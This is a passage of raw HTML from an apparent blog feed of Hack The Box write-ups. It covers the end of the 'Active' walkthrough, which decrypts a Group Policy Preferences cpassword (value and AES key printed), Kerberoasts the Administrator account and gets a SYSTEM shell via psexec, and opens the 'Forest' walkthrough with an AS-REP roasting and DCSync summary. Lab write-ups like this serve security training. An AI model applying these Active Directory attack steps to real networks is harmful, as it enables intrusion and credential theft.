punctuation">"</span>active.htb\SVC_TGS<span class="token punctuation">"</span></span> <span class="token attr-name">image</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>2<span class="token punctuation">"</span></span> <span class="token attr-name">changed</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>2018-07-18 20:46:06<span class="token punctuation">"</span></span> <span class="token attr-name">uid</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>{EF57DA28-5F69-4530-A59E-AAB58578219D}<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>Properties</span> <span class="token attr-name">action</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>U<span class="token punctuation">"</span></span> <span class="token attr-name">newName</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span><span class="token punctuation">"</span></span> <span class="token attr-name">fullName</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span><span class="token punctuation">"</span></span> <span class="token attr-name">description</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span><span class="token punctuation">"</span></span> <span class="token attr-name">cpassword</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ<span class="token punctuation">"</span></span> <span class="token attr-name">changeLogon</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>0<span class="token punctuation">"</span></span> <span class="token attr-name">noChange</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>1<span class="token punctuation">"</span></span> <span class="token attr-name">neverExpires</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>1<span class="token punctuation">"</span></span> <span class="token attr-name">acctDisabled</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>0<span class="token punctuation">"</span></span> <span class="token attr-name">userName</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>active.htb\SVC_TGS<span class="token punctuation">"</span></span><span class="token punctuation">/></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>User</span><span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>Groups</span><span class="token punctuation">></span></span></code></pre></div> <p>As stated <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be" target="_blank">here</a> in the Microsoft documentation, all GPP passwords are encrypted using the same AES key:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text"> 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b</code></pre></div> <p>Since AES is a symmetric encryption algorithm, the same key is used for both encryption and decryption. So I used <code class="language-text">gpp-decrypt</code> to decrypt the password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b4ebbe2d3db1b6adee4b3c969b4a8df5/14945/gpp-decrypt.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 10.759493670886075%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeUlEQVR42m3ISw6CMABFUfaitVEElVZrCyG1WGocEOMncf8buQJjByf35WVSRTbNF2Ge5MeekN749CLcPrTdgLLXUUS7RHWO7E3HYey0p5anMH/K9RTak9l2oLk8MPWdne6oTKRQnsXasByJ3CALN1v9ZefKskZsLT8yxUHtsNDpVwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="gpp-decrypt" title="" src="/static/b4ebbe2d3db1b6adee4b3c969b4a8df5/50637/gpp-decrypt.png" srcset="/static/b4ebbe2d3db1b6adee4b3c969b4a8df5/dda05/gpp-decrypt.png 158w, /static/b4ebbe2d3db1b6adee4b3c969b4a8df5/679a3/gpp-decrypt.png 315w, /static/b4ebbe2d3db1b6adee4b3c969b4a8df5/50637/gpp-decrypt.png 630w, /static/b4ebbe2d3db1b6adee4b3c969b4a8df5/14945/gpp-decrypt.png 742w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The credentials successfully authenticated to SMB which now granted read access the <code class="language-text">Users</code> share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/774bdaab7d2e734ce9c52a77028bc0e2/14945/authenticated-list-smb-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 48.10126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB7UlEQVR42j1S65qbIBDNm7RrNlYjgggC4i0aTbKbprt9/4c5HTTNj/kQgTPnMrtIzIjKT+x5D9dd0U0P9Ms32vkbhZ2QMINDZhEzh0zUOHL3KiYc0tzikDvEvMZ7ZrDLzAWsvsGOXxgvXzid72iGD/jpD0x3Q+VGcD0gK08QdoHvFlg/wTZn+HamdYGoZ5j+tt7bueGBwoxQ9QVVc4N0M3LpiY1HrkckoqNqcaB6N2fIeiHmC6S/gZkZTE/I1QBeTWAlAcaSZPEG9fjAsPyF6z/pcKRLPXU8IUoNosQgJmmnvoWk5qkc4H2Pa+/hlFot6Y2CLCrsDkfyiNWo2g+44TeUv1LXE5jaak/n0dHiF3l59SUYr/AzNMgqZNzgSI3e6XxyCmUALHOJKKaLsgEvO2RFgySvSWazSt3T5Q3QEhiBp/b1L3z/39e6gpQEmDK/SuLEpghSZYuEuieUWML963HMtkdBXtiH9XDcwEJ1RkMIAhQ0CgXFL6oZpVtWc9OCgqBRSGk0okQTgFslD1bTw2plZVUFXZL8J8OKvoOCnaJEy8JBe/Kwv69pr/7JnuST5HQDSHODe6fQEpM42xh5HfzcALV8AgoaSEFMuKaRoHHgilKkUQkVvFwBn6EEyQHsR7IxCiG8PRmGhjEz+AeoAUBZjZZYzgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crackmapexec authenticated list smb shares" title="" src="/static/774bdaab7d2e734ce9c52a77028bc0e2/50637/authenticated-list-smb-shares.png" srcset="/static/774bdaab7d2e734ce9c52a77028bc0e2/dda05/authenticated-list-smb-shares.png 158w, /static/774bdaab7d2e734ce9c52a77028bc0e2/679a3/authenticated-list-smb-shares.png 315w, /static/774bdaab7d2e734ce9c52a77028bc0e2/50637/authenticated-list-smb-shares.png 630w, /static/774bdaab7d2e734ce9c52a77028bc0e2/14945/authenticated-list-smb-shares.png 742w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Downloaded the share as an authenticated user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1ad985856742b5e4efb9bef02a436d22/14945/authenticated-download-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.0253164556962%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACQ0lEQVR42k1T207bQBT0d7TqJSUQ7Pi6vtuxvY4dmySUAhKgwgMSUv//E6azhxZ4OFrbe3Z2Zs7YWsVb2NU1XP0At5zR7q7RTbcYDneo+p9QeQeVbLCOO0RxjSDM4LOiOJfyowxnYYUw7+GqBpaTXyFIGhTNTKAbqaI7ouwukTV7VPoSqtwh3cyw0wlRMUEVgwCofIukGuU55hoVW1gBmaU87EU1YjZm7RFhNsDPtnBjLXXqVTjzSpwojaDYEWBEzEtUaVYCEVgAuVqL/hHf9G+sgg3irEO2uSBIBydqWC3O+X1xnuLEZkVkqbbwEs2+GQlB8+aCQIOwVsUI6/v4jC/9E85VR9lG4hFBykNk5v0DXtgZThyW2uPrqiBgh6SehaXp8fl+5hZYssf6vPuDT9tnOMkAbYZxvJdGIyvkzUayMGTzMvsFv9yjHa/FW+N32R2EmWHohDUsu7qFR88cP0eYanoxYU22dvgu+YcwzHGa9Ii4bzyOivHNS8M4THthajmU7A0PwiThtPJ6Ehnmfa1aAv8HJMN4RNIc6dtBLs7bA6c8iS1u3GLN1Vp1T8zhFQ9rpNzMDCA3DNgr0w+ACaVt9gIWlxPBZnl2ySwQhhrWWj8i7G6EUWQkUMrayBXJzQfJBFQ9YzNJn5Fs8mlWE+h3huMLbH3PDz1KZrDm3xHwJo9+mUl/nPIynZHpq9fQM14FE5G3e4mZYSceups7hPWB6J3EJcp3ws5INYNZ+fXbUJa0wAwwYOgDWQdhK4CpluH8BbjUjFR9GTshAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crackmapexec authenticated download shares" title="" src="/static/1ad985856742b5e4efb9bef02a436d22/50637/authenticated-download-shares.png" srcset="/static/1ad985856742b5e4efb9bef02a436d22/dda05/authenticated-download-shares.png 158w, /static/1ad985856742b5e4efb9bef02a436d22/679a3/authenticated-download-shares.png 315w, /static/1ad985856742b5e4efb9bef02a436d22/50637/authenticated-download-shares.png 630w, /static/1ad985856742b5e4efb9bef02a436d22/14945/authenticated-download-shares.png 742w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The user flag can be found in <code class="language-text">/Users/SVC_TGS/Desktop</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 582px; " > <a class="gatsby-resp-image-link" href="/static/0ff5f00079fbcc31b9909b6097892dbc/87b80/users-share-tree.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 96.83544303797468%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAAC30lEQVR42pWU6U4bQRCE/Siw9+x932Z3DRhscwoiBYISKYeS93+BSs2uOYxMpPxozZ7fVHdXz0yPOujFFbT8GmqyhhH1iKtTVP0lY4Oy22BY3aM5vkLJ+3ZxibpfI2uXfHaB/vSa362huQU0J8dMEKBnG6jpBopdQhUpVDtn8NouXsN5Dc2ZftacjO+y7fUUMzfp4GRLOP03GP0vqryE6tYEZ1tYvo1dsLYDfgO0oznssIHlFRDJCazmAVr9hYpvCW6gOBUB1a5iZ1r3Ap24gyBUc0ocminkBl4mwZ+hN08wmkeY/W/o0XJS7byWQdsDnQm/hOVX0HmjWBlESMVslFndQ8wfEdUrRM0FN1lAETkO+c37UISMqfYzm0DhskZmhEM9gGImEHEPr7kl8AlusYaXyE2O4KU9gnzBdYCfDeMa5sfjs4D3pldOKcs0daasmDEOVA8GdwvSI8R5h4626Je3o30qRtaeI5+vxrXqL1APlwiLY8jmGm5F4NgUAl1ZfEKtFIYVU9URQqbantyhpQfrYYOoWLwA5feyBLKWz6WYUiZQPAO3xZZqRdDCru9hdD+h9X+ghwOMgLX1Kip559E3QYVMOTwisN55IXcUQQ0nWRB8N3Zca79CSzlV0enoiv1AetAOGqoq3piZqYtiVGn5Nes5R1SdoVrcIB9uEbLzhle/pLwDFJxBS3qIDVF0nxGw4/FYSxESSKjsrtd+Qjw8IGK4+WoSsE+hTFcENLYtjU1f6ey05uOAYIMb2bSQUd4hGJ6QLb8jadajZT5UaPucDLY8a1doeMKU3QWy5gxe1ODQmJRa3NBN+jGkam3b2b0K/YQmTU9oixt0tEfWLGmPU3jxfPSlKqZJmKYiH0EfwbZN6eBX1zxtfsCsH6F53TjTiiWnJyHw+SAoP+zsDlA16TvZ0YgjVV0hLM/Z1X6sqSrN+g81e4FuwIng6RJx+KO0G63iy1lNFxPsP4F/AWWFWFcDAaViAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="users share tree" title="" src="/static/0ff5f00079fbcc31b9909b6097892dbc/87b80/users-share-tree.png" srcset="/static/0ff5f00079fbcc31b9909b6097892dbc/dda05/users-share-tree.png 158w, /static/0ff5f00079fbcc31b9909b6097892dbc/679a3/users-share-tree.png 315w, /static/0ff5f00079fbcc31b9909b6097892dbc/87b80/users-share-tree.png 582w" sizes="(max-width: 582px) 100vw, 582px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, while looking for ways to escalate privileges, I checked for kerberoastable accounts since I had valid credentials for <code class="language-text">SVC_TGS</code>. I used <code class="language-text">GetUserSPNs.py</code> from <a href="https://github.com/fortra/impacket" target="_blank">Impacket</a> which searches for accounts with SPNs, and when found, it sends a TGS request to the KDC (due to the <code class="language-text">-request</code> flag) to retrieve a TGS. The TGS is encrypted using the NTLM hash of the account the service is associated with. Since the <code class="language-text">Administrator</code> account had an SPN (<code class="language-text">active/CIFS:445</code>), I was able to obtain a TGS for that account:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/55842b7c58b38d355c669c74a88e5fc6/ff233/GetUserSPNs.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC8klEQVR42l1U2XLiQAz0pyQVshBz28YY3/eBuXFISDb//xm9rTG1W7UPKs0h9bRaM6ONrAzDzRkjr4O+ruBmR4T1FX55RlCcYLglZqsUEyPAdOliZniYmx6mho/BxMFgvKbZf00zvAZm0EIn8NhKMXcKLAmycHIsN4XylldhZkawnBTmOiFgiLkV4XW6wYsC/AeqmUzwkxbmJoftlZgyUV+GeB6u8DrZYOXXmHDtabTCE9ee6YczT5mAveh27x+g2ogbFlk5TFwRdDx3MVm4LCnAkofZQYM5S56a8cMiHtJgHW7V/G0RKAJjI8Ro4UNbMNgNaqwJaNgpFlYMP6phOwlZF9jEOzhhq7yb7OFErdJ0sc4wtzOOE0yZI2tjI4I2eCNVnZSHJgZDC4ORxXFvMlZ7DxuMHeWl7P/t6eE1YWSTie3VFLyEsS6wYqMsl6zdjKwj/NJXeJs60Gcbluir8qRcKbUvNyLLBDrL18L0hKL5RL69o9p/IW9uyOp3lM0VGa063Ok7rnXI6zPy6oiivaHYSY74D2X18QthfoIW51c0uy8U208m3VAffivQqu2Y+KGSsuZdAZT7T8Z1SIsjGgLIPCd4zrjm9I0gP0ILkhNKgqW1JPfWM7yg5MkxmYXFGSlBs20PXNDH5UUBCWjCGGHopQdoXnRAWna8iycE2RlRcWUwQbgp3Y7IJuaLSaoLx9wnkFj88MJeDhRQh1epZ9iQGRmm1btimChP1sJCgNIdiod+WXnk+pnSfCkwkSSurpzf4fFaaVF+RsXkeveNev9N3e4s9a58zoNE24rz7elHSVC2LL2URlJLspKGiI7t5afX0I8PZNcphmJJ0SFhycI2Li5qLJr23e+UliE/kJjJMYGFXd/1D7i8/Job7nkidcupC9lm1Y0lEYzdF23lgJi6JhIjEhBYrofoGpfSLMYQVFhu+Io0x2/ZgCO8aA9hKz5IjmrsBjuIxh7HAWOEgeXy5+Ellt9n/niC8vTkGcrT+wMB/i9G15ZJFgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="GetUserSPNs.py" title="" src="/static/55842b7c58b38d355c669c74a88e5fc6/50637/GetUserSPNs.png" srcset="/static/55842b7c58b38d355c669c74a88e5fc6/dda05/GetUserSPNs.png 158w, /static/55842b7c58b38d355c669c74a88e5fc6/679a3/GetUserSPNs.png 315w, /static/55842b7c58b38d355c669c74a88e5fc6/50637/GetUserSPNs.png 630w, /static/55842b7c58b38d355c669c74a88e5fc6/ff233/GetUserSPNs.png 746w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I saved the ticket in a file called <code class="language-text">hash.txt</code> and used <code class="language-text">JtR</code> to crack the password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f4b3a8fb3e8066fc773911fd0e2fd3f5/6ce55/crack-password-from-TGS.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 82.91139240506328%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAADFElEQVR42l1U23baSBDUp2zWCWBAgACB7tJodOWOsY2d+OT//6K2uuOcze5DndbMdNdU18zIGWw6TLM3hN1PLKIGUXFAUp6RVhdssx1GiwR/P27wbRri6yTAw3ircTALORcQW8XADRROWl9h2iv60xvK/hkhCWNzRMb5pDrrXGzPyDnOmydF0d5gumek9QVF96Rojq+sOcEpuxvqwx3V7gXV/hW7yweqwxv6yw8dN8d3Xa/3dzScb0/vsP0LOkb51lrmded3cjzDsSRsOFEzycpOe4k37J8+SEbVVJI318/Cu5IIcSObSGSOZX1//QErhGl5QG5PyMojcoE9orAyt2ebFyXL1ZbPVj+R0gaxRdSJ36a/cXyBY+iJIKdfQmxqJpo9TEUfOSeqtHD3SrUv6qn4KEoNOxFC2cjSMiF2CrLWTGpZ0LDthgT1TjxjK42sPaHUQ7trm+3pu3oohCWjWCGK1XOSOpaDur+z4APtQZLviootFFQpvrZi+uGZG5yZK2peVZHEXwf36xBlIyc19MlK27wG9sq22EJ94xx9rGlF++9VKehnUe4hvstYvC24JjYImbZcNjeUJDAsLkhq2hcqu6qPOdckUU7askjunnxHec/Lf0Ii95OE8i1kkTnAmW07zKIbvPSGVdQjLi+qNC12CLIeXtzC9UvMg4rRYDhP8DDZ6usRyMv5E44Xn7Axb7ztH3x2Z0SijqeZ6NNrMfIiDOYhhotI8bjOMNmUmKwKjEg+nMX/JczMGX7AN5zxmpRXBOke22SH+dpi4VvMljlcL8NiXTAmmHkx5xK4ywzTVa6kv9UKnDiqkBASI/4cVkGLGcncValRsNiw3ZXBTFpfGzy6/EGMVhjwJ/G4SFXl2EtJHvNiW54yzQyiFn7YUYnF1DOq8HdcbhslXYUtlmHNcYV1YOGxdVdbjzWOSe54TJ6uOyyjExOYTHh+zYKW5BVG0wTfxvTQjRWjWYLBNFZ1AzfEl89Wv4x8hbPgoczDC/4aG4zcBGtuIGQ+1Xh+heEkwsOQRaM/wVMe+ow+vv7vlP8BbrlTL3rX/UoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crack password from TGS" title="" src="/static/f4b3a8fb3e8066fc773911fd0e2fd3f5/50637/crack-password-from-TGS.png" srcset="/static/f4b3a8fb3e8066fc773911fd0e2fd3f5/dda05/crack-password-from-TGS.png 158w, /static/f4b3a8fb3e8066fc773911fd0e2fd3f5/679a3/crack-password-from-TGS.png 315w, /static/f4b3a8fb3e8066fc773911fd0e2fd3f5/50637/crack-password-from-TGS.png 630w, /static/f4b3a8fb3e8066fc773911fd0e2fd3f5/6ce55/crack-password-from-TGS.png 745w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With the <code class="language-text">Administrator</code> user's credentials, I used <code class="language-text">psexec.py</code> to obtain a shell as <code class="language-text">nt authority\system</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 611px; " > <a class="gatsby-resp-image-link" href="/static/0aafcfab1fe404c08ba1f4306aaa36bf/a4271/root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 84.17721518987341%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAAC4ElEQVR42n1U2XLaQBDUn8QgbiTQrdUthEBcMsYpVyX//yGdnvWBHVfyMLUroentYxZj5JQwwx7D8Ammd8RabVG0N+TtFeX+xv0VcXnGyFIYLCJM7BRjK8FgFr7W/LWG/M1cxjDc4hFu/Qwr6xHUT6i7ZzTHF+wuv7Dvf2N3ftHPYXlCtO0RFUdkDXtUi3W0hRO3WIUNll6lQY0gaZGUB9hujglPGJOJMBgtE56oMFvnmK4yzUxWcxGTbaL307d376zlN0Px5Hp3Q90+IqtPKDYXJMUBirU7kVl+0A0jfjycR7pJVr1/Wz+eBTBiQ1ZfkBMor8+oKEsY5xXflx38eAPLr8hYsSnWTf8rI0p3GrCkLwnZlk2PtDxCZTusnBR+VJHlkT5tPmS9lxzyDTAuzkjrnqBnglFu3hHwhDgTdluEyQ5x0Wm//pYoKb9LvTPM9pR2ghtsECju60f6d4Eqe3jqQE97qHSLhR1jbkVYeTmcsILllfB4mNjxGdRwggZpdUWUnuDFHYEuWIdb+EnH1BUeTJvMwtdQyMicBTCnHsvBeBF+s4GAMjY9JZ4QpAck1QVLt8JsVWDKhpmdYM7hl/GRWrjcOwXBAwxMC8OpT6C7l4btbuhVBzfaUUoLN95jRdZOzGe/gMypSytsWiLBOPRVVg0gXk5cvX4AquyIzf5Fs6y2vHKbK0O6ag83nM1ANfwwwY9JgAdKfpi+Xrl/js3ab5gk73Cw1RWkHRyyteW97MlyasW8Eam+Rfdm9UXqJ8kVE24h0uerkkCURmBPpBPU9msmW2hgm3M5HK/vJeHMv7I1FIe2bn8iTo+U1+mREWABVfyXGc7EK94SkUrZ5ox+yfwxDA06cfiN/2mw6WHZ3ChbBnnP63dlEAcNumC6g2mkE484BSGnYMmUhwIqcnkVJRQN/gZqmGyQ080JZ2qmNGjKQOYEsWiDSPc54BJSWvXc73lAfgcVtgImQc0j/AEWICQMJIqRiQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root" title="" src="/static/0aafcfab1fe404c08ba1f4306aaa36bf/a4271/root.png" srcset="/static/0aafcfab1fe404c08ba1f4306aaa36bf/dda05/root.png 158w, /static/0aafcfab1fe404c08ba1f4306aaa36bf/679a3/root.png 315w, /static/0aafcfab1fe404c08ba1f4306aaa36bf/a4271/root.png 611w" sizes="(max-width: 611px) 100vw, 611px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-forest/https://mgarrity.com/hack-the-box-forest/Sun, 08 Oct 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1b9992a606ed74488c34f0cf3d6d5a82/3b67f/forest.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+klEQVR42mMQkdX+jxPLaf8XltH+LyABoUXl8KiFYgZcEiDNApJaYFpOU/u/mLz2f0FJiCUkGwgyRBBomJqx/v+IGpv/BQs9/4cWW/5XNdIDG4rPpVgNBHlPQlHnv3uO2f/gTo//M5Zl/PdscPzvkW36X1xB578wSS6Ug3hNUVf3f2Sbzf/85cH/81Yl/E9Y7Ps/ssX2v4I20JVSWjhdiTMMRWS0/se1Of7vvJT7P21v1v/iown/U7qd/gtJauINR5xhKCCh9V/FUO9/dIvz/6iJXv9D6hz/K+qRGYbwiAEaCnKRnAZQDOhNsmMZ2VBROZ3/QjIwNuF0CADNQAdkEzb3PwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Forest" title="" src="/static/1b9992a606ed74488c34f0cf3d6d5a82/50637/forest.png" srcset="/static/1b9992a606ed74488c34f0cf3d6d5a82/dda05/forest.png 158w, /static/1b9992a606ed74488c34f0cf3d6d5a82/679a3/forest.png 315w, /static/1b9992a606ed74488c34f0cf3d6d5a82/50637/forest.png 630w, /static/1b9992a606ed74488c34f0cf3d6d5a82/fddb0/forest.png 945w, /static/1b9992a606ed74488c34f0cf3d6d5a82/3b67f/forest.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Forest is a Windows machine running Active Directory. An anonymous LDAP bind allows for enumeration of the system which can be leveraged to AS-REP-Roast a list of users and obtain a TGT encrypted with a user's password hash. After cracking the password offline, the credentials can be used to authenticate and further enumerate the system, resulting in the discovery that the compromised user is a member of the Account Operators group (members of this group have account creation, modification, and group membership management privileges). Therefore, a new user can be added to another privileged group (Exchange Windows Permissions) which has WriteDacl access rights on the domain, this grants the ability to run a DCSync attack and reveal the NTLM hash for the <code class="language-text">Administrator</code> account.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ce945090632cc6e6d4d48cc5c102ecb5/14945/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 106.32911392405065%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAADeklEQVR42lVUV3bbQAzkTRKrsffeRbFIlmRbcpzk/idBBqCK8zEPyyU5CwwGqxjpREb1m/TiQnrSUzVeaDr/pRHoDl8UFhO52De8mnRAcyvB0kgFK/OORKBU/ZXy7p3q4YOy9gicqBkulFQHSupXeU6qV7KjLZlhS4bfCITQfOJOqhTdmYJ8FLJy90787GcDRcUecSQ73JIFooWe0Isa0wtHLZbnpZ5KXBjAjVRpp0/5MW2OyPIiUJ2KtvtfUnK5e5OynbiTkmc0UjZnagZzxgai6pUgHK9U3TKr8XPdv5OL8hpIwGAth9NfaqerHBqiGgtZ21EHbXe3CuYqNK8iJYU+BXTK8XGATD186OBlgI/9BD9FLXkxgDVL46U9uYCfDiKNE++wP+F9LzorAV7YSNkCdKeQ9QaaqNBDs3NSsd7oIWlGRJpTotRa4sYuaG3lErl8Ff/yWmmhWdW9IcOToD/8piDdSdkeEGU9hZxp2Mx7yM5CVIX8SSTAAUoD2/SHX8Sx3J5px1qVE1kQ3/JbaNQBOzLRCMNOsF+Q6XIlJfa5ITUw24kPUMIUusSs144cvAhh9AAw/S25cS9kBpM5GVlBLTpZAWfb0Er16WXtwTo3+wDQcKSkeAX2lNdHZNDSj2VEPzfwmsYfZrTYRIAPv2WPHxcyKYgbEGrhY3IUEyJ34xf10xcivDd+UpjtKcr3EL2AeTNawtALZLM0cyB7TsmNZKlFT0Iv6qHblxDl9Ymy8hXxjGbsZ7IbFlyaGkpWDyIZOz4gexI6QSdERXOmrDqhIUdKiyM0Gshwm7lshoqRW8+azXDpZeViP8CByXfCLZXtG7X9RWJaHmCTCc3BLCM6qMCJ0LR0lAbZ+J6nw0UjeQB0C2TQd4n5FkIDczsc/lA3fNJ2uEos4Ec37OHDgVSrlJLXZjHDYORY56LxCiVLltwYPUZTYAnWj3VshfBK9faD+CDDqeE5npwCZUOnB1K5aR7g7KQxsI0L47J+SXGQRoTJQLpdkQkyjmyjtZ7DHihNTQWs53+Egvhum0rImJRNHmUTmnLA5TCCfH7mxt0zNuxa4orNrCXfMN+Rio9p8HFTJPn+QcAH3Nfz5DzJg3iAT3GFQSqTRzPgyWmlUSaiEoOIrywbL32+ilAyZ+Shsy4iP7Ms7FeOXIXGFwGaoqIpGgPZyw1k5fQP6iWpRa+36aEAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/ce945090632cc6e6d4d48cc5c102ecb5/50637/nmap-scan.png" srcset="/static/ce945090632cc6e6d4d48cc5c102ecb5/dda05/nmap-scan.png 158w, /static/ce945090632cc6e6d4d48cc5c102ecb5/679a3/nmap-scan.png 315w, /static/ce945090632cc6e6d4d48cc5c102ecb5/50637/nmap-scan.png 630w, 